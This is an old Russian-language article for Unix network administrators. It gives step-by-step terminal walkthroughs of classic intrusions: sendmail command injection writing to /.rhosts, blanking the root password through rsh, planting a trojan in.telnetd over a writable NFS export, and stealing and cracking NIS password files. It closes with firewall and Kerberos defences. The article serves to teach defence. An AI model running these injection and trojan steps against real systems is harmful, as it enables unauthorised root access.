..	Примеры вторжения
	=================

Для того, чтобы разработать реально действующие контрмеры, необходимо знать способы и методы взломщиков. 
Статья основана на опыте администрирования сети при постоянных попытках взлома и методических указаниях CERT.

Задача данной статьи состоит в том, чтобы обратить внимание администраторов сетей, подключенных к Internet, на очевидные бреши в системе безопасности наиболее популярных систем. 
Кроме примеров взломов и возможных дыр, постараемся кратко описать основные средства борьбы с этим неизбежным злом. Учитывая тот факт, что большинство серверов на сети используют операционную систему Unix, обзор возможных прорех в системе безопасности имеет смысл начать именно с этой ОС.

Основные методы получения несанкционированного доступа
------------------------------------------------------

Начать обзор следует с возможности взлома через электронную почту. Для пересылки электронной почты по IP на подавляющем большинстве систем используется программа sendmail, разработанная в университете Беркли. Задуманная как чисто служебная утилита, эта программа приобрела огромную популярность и вошла в состав дистрибутива многих Unix-систем. Однако она содержала в себе очень серьезную ошибку, благодаря которой любой желающий имел возможность выполнить на удаленной машине команды с привилегиями суперпользователя. Обычно взломщики пытались отправить себе файл passwd для подбора паролей либо помещали свою информацию в файлы, использующиеся программами ``rlogin``, ``rsh`` для запуска ``shell`` без запроса пароля.

Пример 1 - соединение по порту 25 (SMTP)::

  crack$ telnet target.remote.com 25 
  Connecting to 123.456.654.321.
  220 sendmail SMI/4.3.5.2 ready 

Данная версия (sendmail SMI/4.3.5.2) содержит уязвимость::

  helo xxx 
  220 Helo xxx, ( crack.edu ) 

Вместо ответа вводим команду ``"|echo crack.edu>/.rhosts"@target.remote.com``.
Каманда добавляет в файл ``/.rhosts`` имя компьютера для удаленного доступа::

  mail from: "|echo crack.edu>/.rhosts"@target.remote.com 
  200 Sender ok. 

Вводим неправильный адрес::

  rcpt to: nosuchuser 
  500 nosuchuser: user unknown

Несмотря на сообщение, продолжаем диалог::

  data
  230 Enter mail, end with "."
  200 Mail accepted

Доступ к удаленной машине получен ...::

  quit

Соедиряемся так, чтобы не было видно через who::

  $ su
  # rsh target.remote.com /bin/csh -i 
  Welcome to remote.com! 
  Warning! No access to terminal, job control disabled! 
  target# 

Эта ошибка присутствует в нескольких десятках различных вариантов ОС Unix самых разных фирм. 
Кроме того, существуют и более простые способы при благоприятных условиях: удаленная машина Sun, система SunOS 4, NIS не запущен, система поставлена, и ничего не исправлялось.

Пример 2::

  crack# su - bin
  $ rsh target.remote.com /bin/csh -i 

В файле ``/etc/hosts.equiv`` есть запись "+" и ошибка...::

  Welcome to remote.com! 

Каталог ``/etc`` с владельцем ``bin`` ...::

  Warning! No access to terminal, job control disabled! 
  $ ls -ldg /etc 
  drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/ 
  $ cd /etc 

Делаем ``passwd`` доступным на запись ...::

  $ mv passwd passwd.was 
  $ cp passwd.was passwd 

Редактируем::

  $ ed passwd 
  2341 
  1p 
  root:Nkkh&5gkljGyj:0:0:Root:/:/bin/csh 
  s/Nkkh&5gkljGyj//p 
  root::0:0:Root:/:/bin/csh 
  w 
  2341 
  q 

И соединяемся с правами суперпользователя::

  $echo /bin/csh -i | su root 
  Warning! No access to terminal, job control disabled!

Чтобы никто не обнаружил взлом::

  target# mv /etc/passwd.was /etc/passwd 

Кроме электронной почты в TCP/IP сетях очень широко применяются различные виды распределенных файловых систем, 
самой популярной из которых является Network File System (NFS). 
В случае неаккуратного заполнения файла /etc/exports или использования дистрибутива с ошибкой (SunOS 4.1) может возникнуть следующая ситуация.

Пример 3::

	crack$ showmount -e target.remote.com 
	Export list for target.remote.com 
	/home Everyone 
	/disk3 neptun pluton alpha
 
Домашние каталоги доступны по NFS.
Монтируем каталог::

	crack$ su 
	# mount -t nfs target.remote.com:/home /mnt 
	# cd /mnt 
	# ls -ldg * 
	drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/ 

Изменяем ``.rhosts`` пользователя:: 

	# echo crack.edu > user/.rhosts 
	# cat >> /etc/passwd 
	user::257:20::/: 
	^D 

Создаем такого же у нас:: 

	# su - user 

Становимся им::

	$ rsh target.remote.com /bin/csh -i 
	Warning! No access to terminal, job control disabled! 

И заходим на удаленную машину::

	$ id 
	uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) 

Каталог доступен на запись::

	$ ls -ldg /usr/etc 
	drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc 
	$ grep telnet /etc/inetd.conf 
	telnet stream nowait root /usr/etc/in.telnetd in.telnetd 

Нашли программу, которая запустится 
под root"ом из нашего каталога::

	$ cd /usr/etc 
	$ mv in.telnetd in.telnetd1 

создаем троянского коня::

	$ cat > in.telnetd 
	#!/bin/sh 
	exec /bin/csh -i 
	^D 
	$ chmod 755 in.telnetd 

и запускаем его::

	$ telnet 127.1 
	Connecting 127.1. 
	Warning! No access to terminal, job control disabled! 
	# chown user /etc; 

Делаем ``/etc`` своим::

	^M: command not found 
	# exit; 
	^M: command not found 
	Connection closed by foreign host. 
	$ cd /etc 

и далее как раньше как в Примере 1.::

	....... 

Если на машине работает NIS-сервер и не принято дополнительных мер, то с помощью специальной программы можно утащить по сети файл ``passwd``, общий для некоторого числа машин. 
В случае несоблюдения правил при создании паролей, есть довольно приличная вероятность, что программа ``crack`` подберет несколько. 
Дальнейшие события могут разворачиваться по одному из сценариев для получения полномочий суперпользователя (после того, как вы зашли на удаленную машину как пользователь).

Пример 4.

Проверяем на NIS сервер::

	crack$ rpcinfo -p target.remote.com | grep bind 
	120000 2 udp 2493 ypbind 

есть такой... ::

	crack$ ypx -o target.passwd -g target.remote.com 

забираем файл паролей::

	crack$ crack target.passwd 

и запускаем подборщик паролей:: 

	[ a lot of time ] 
	OK, user "user" has password "iamuser" 

нашли, заходим::

	crack$ telnet target.remote.com 

далее как в предыдущем примере::

	..... 

Естественно, что если известны способы преодоления защиты, то должны быть разработаны и средства защиты. 
Для минимизации возможных попыток проникновения в сеть очень эффективен сетевой экран (firewall), умеющий анализировать поток проходящей через него информации и осуществляющий фильтрацию пакетов. 
Очень рекомендуется запрещать rlogin, rsh, RPC (см. Примеры), а также пакеты, направленные на порты 2048 и 2049, - это порты данных для NFS. 
Также рекомендуется четко определить машины, принимающие почту, и открыть порт 25 только для них. 
При необходимости возможна конфигурация, которая вообще запрещает какие-либо заходы по сети в локальную сеть, при этом разрешая изнутри использовать любые TCP-сервисы глобальной сети. 

Борьба с возможностью анализа содержания IP-пакетов
---------------------------------------------------

Все рассмотренные выше примеры относятся к так называемым "активным" методам. 
Аккуратное администрирование системы легко сводит на нет все рассмотренные дырки, но совершенно бессильно в случае применения "пассивной" атаки. 
Что это такое? 
Самый распространенный, простой в исполнении способ - анализ информации, передаваемой по каналам связи, преимущественно по сети Ethernet. 
Основан он на свойстве этой сети, благодаря которому каждый передаваемый пакет может быть проанализирован любой машиной, подключенной на этот сегмент сети. 

При наличии достаточно быстрой машины с адаптером, разрешающим работу в режиме приема всех пакетов, можно легко извлекать такую информацию, как пароли пакетов NFS. 
Если на этом сегменте расположено несколько маршрутизаторов, то в наш фильтр попадут не только пароли нашей сети, но и те, которыми обмениваются маршрутизаторы. 
Таким образом, за сравнительно короткое время можно собрать коллекцию паролей на нескольких сотнях машин.

Для борьбы с такими методами в конце 80-х годов была разработана система сетевой идентификации пользователя под названием Kerberos. 
Основной целью было полное исключение пересылки паролей по сети. 
Пользователь вводит пароль только один раз при регистрации в системе, после чего ему выделяется "билет" на несколько часов, который хранится в файле в зашифрованном виде. 
Этот билет содержит информацию о пользователе, время выдачи, адрес машины и случайно сгенерированный ключ для дальнейшего обмена идентификационной информацией. 
Первоначальным ключом служит пароль пользователя. 
Билет, выданный при входе в систему, используется для получения вторичных билетов, по которым может быть предоставлен какой-либо сетевой сервис. 
Со стороны сервера используется аналогичный механизм с той разницей, что в качестве пользователя выступает программа, обеспечивающая запрошенный вид услуги. Таким образом, программа пользователя и программа на сервере получают пару случайных ключей, с помощью которых они шифруют идентификационную информацию, прилагают к ней контрольные суммы и на этой основе удостоверяются в том, что они те, кем представились. 
После этого программа пользователя может получить доступ к сервису без запроса пароля. Без знания первоначальных ключей сеанс не состоится. Кроме того, полученная пара ключей может быть использована для шифрования всего сеанса работы по сети. Эта система имеет целый ряд недостатков. Во-первых, подразумевается четкое разделение машин на рабочие станции и серверы.
В случае, если пользователь пожелает, зайдя на сервер, с помощью telnet зайти на другую машину, идентификация не сработает, так как пользователь имеет первоначальный билет только на той рабочей станции, где он вводил пароль. 
Иными словами, в Kerberos версии 4 полномочия пользователя не передаются на другие машины. 
Кроме того, требуется выделенная машина под сервер Kerberos, причем работающая в максимально секретных условиях, поскольку на ней содержится база данных, где содержатся все пароли пользователей. 
Kerberos версии 4 очень ограниченно применим в сети, где возможны ситуации, когда в силу ряда обстоятельств сервер Kerberos недоступен по сети (непредвиденные сбои в роутинге, ухудшение или обрыв связи и т.д.). 
Часть недостатков, перечисленных выше, ликвидирована в версии 5, но эта реализация запрещена к экспорту из США. 
По описанному алгоритму работают также системы Sphinx от DEC и NIS+ от Sun. 
Отличаются они применением различных алгоритмов шифрования, другого протокола передачи (RPC вместо UDP) и способов объединения административных доменов в иерархию.

Заключение
----------

Кроме рассмотренных, существуют и другие, более изощренные, способы вторжения. 
Многие из них можно нейтрализовать простым "аккуратным" администрированием. 
По статистике большинство взломов осуществляется из-за халатности администраторов или персонала, эксплуатирующего систему. He откладывая в "долгий ящик", проверьте перечисленные выше способы несанкционированного доступа - если удастся "взломать" ваш компьютер вам, то это могут сделать и другие.
